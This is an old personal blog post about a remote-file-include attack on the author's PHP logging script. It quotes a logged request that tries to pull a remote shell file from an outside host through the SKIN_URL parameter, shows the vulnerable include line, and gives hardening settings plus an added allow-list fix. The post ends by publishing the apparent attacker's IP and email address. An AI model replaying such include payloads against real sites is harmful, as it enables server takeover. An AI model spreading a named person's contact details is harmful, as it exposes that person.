25th September, 2007

Fun With IP Tracking

Tuesday, 11:22 am in Geeking

I’m an obsessive IP tracker.  Literally everything on this domain tracks IPs.  The hits tracker tracks IPs.  sk.log tracks IPs.  Every Apache error page tracks IPs.  And every single generic mail-to form?  Yeah, they track IPs as well.

So I wake up this morning to find my inbox full of error notifications.  Someone’s been hitting my site hard with something.  Something that looks a bit like this:

  ERROR: 404
  REQUEST http://skode.void-star.net/projects/sk.log/log.inc.php?SKIN_URL=http!//r3d-crew.com/sshell.txt?
  REFERER:
  BROWSER: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
  MESSAGE:

And they’ve been looking everywhere for it.  For those who are curious, it’s a remote include vulnerability that affects sk.log v0.5.3 (the one I don’t recommend anyone uses) running on servers that don’t have register_globals turned off and that allow include() over HTTP.  The vulnerable line is this:

  include_once( "$SKIN_URL/php/logdisplay.inc.php" );

The problem is that it appears as the first line of the file, before anything has defined $SKIN_URL.  If the file is requested directly with SKIN_URL in the query string, you’ve got a problem.  Well, so long as your register_globals is on, which is getting rarer and rarer nowadays.  In a nutshell, the vulnerability is caused by a logic error, and could easily be fixed by adding a single include line above this one that pulls in whichever file defines $SKIN_URL.  The error wouldn’t be evident unless you were calling log.inc.php directly; and had looked at the code, of course.

Now, sk.log v0.6 doesn’t suffer from this vulnerability; it uses the same sort of logic in several places, but the variable part of the include is returned from an object function call, which as far as I know can’t be compromised by query string data (well, not in this way).  But I’ve still learnt some important lessons this morning, notably:

  • The logic error described above?  Yeah; easy to do.  Watch out for it.
  • register_globals is still bad…
  • …but allowing include() via HTTP is even worse.

Theoretically, the latter should be off by default in most PHP installs.  However, it might not be, in which case it is definitely in your interest to turn it off yourself.  The directive you’re after is allow_url_include.  Depending on how your server is configured, you may be able to override it with a custom php.ini file containing:

  allow_url_include = Off

A .htaccess file:

  php_flag allow_url_include off

Per-script:

  <?php ini_set( 'allow_url_include', 0 ); ?>

Or none of the above (which sucks; email your host and complain).
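The fix sketched above (define the include path yourself before the include runs, and never let it be a URL), as an added PHP example that is not sk.log’s own code.  The skin names, the skins/ directory and the ?skin= query parameter are assumptions; only $SKIN_URL and logdisplay.inc.php come from the post.

```php
<?php
// Added example, not sk.log's own code. It keeps the include shape from the
// post but defines the include path itself, from an allow-list, before the
// include runs. Skin names, the skins/ directory and the ?skin= parameter are
// hypothetical.

// Skins a visitor may request, mapped to directories relative to this file.
// The value is never a URL, so allow_url_include has nothing to act on.
const ALLOWED_SKINS = [
    'default' => 'skins/default',
    'plain'   => 'skins/plain',
];

// Map a requested skin name to a local include path. Anything not in the
// allow-list (URLs, "../", the empty string) is rejected before the include.
function skinIncludePath(string $requested): string
{
    if (!array_key_exists($requested, ALLOWED_SKINS)) {
        throw new InvalidArgumentException("unknown skin: $requested");
    }
    return __DIR__ . '/' . ALLOWED_SKINS[$requested] . '/php/logdisplay.inc.php';
}

// Defence in depth: allow_url_include is a system-level directive, so check it
// with ini_get() and refuse to run while it is on rather than assuming it off.
function assertNoRemoteInclude(): void
{
    if (filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN)) {
        throw new RuntimeException('allow_url_include is On; refusing to run');
    }
}

assertNoRemoteInclude();

// $SKIN_URL is assigned here, explicitly, so a register_globals query string
// cannot pre-populate it, and it only ever holds a validated local path.
$requested = $_GET['skin'] ?? 'default';
$SKIN_URL  = skinIncludePath(is_string($requested) ? $requested : '');

if (is_file($SKIN_URL)) {
    include_once $SKIN_URL;
} else {
    // Standalone demo: the skin file does not exist here, so just report it.
    echo "would include $SKIN_URL\n";
}
```

Requesting ?skin=http://example.invalid/x.txt (or any name not in the allow-list) now ends in an exception before include_once is ever reached.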

Anyway, the actual point of this entry was to have a bit of a laugh at someone else’s expense.  Because, while I was clearing out the error notifications, I noticed that the vast majority of the fishing attempts came from a single IP address: 78.166.43.14.  The same IP address had helpfully filled out a download form for me, and even provided an email address: kezzap@hotmail.com.

Seriously, dude; if you’re going to try hacking someone’s site, how ‘bout next time you don’t give them your email, huh?

  • v-s.net v0.6 and all content (unless noted) © Dee.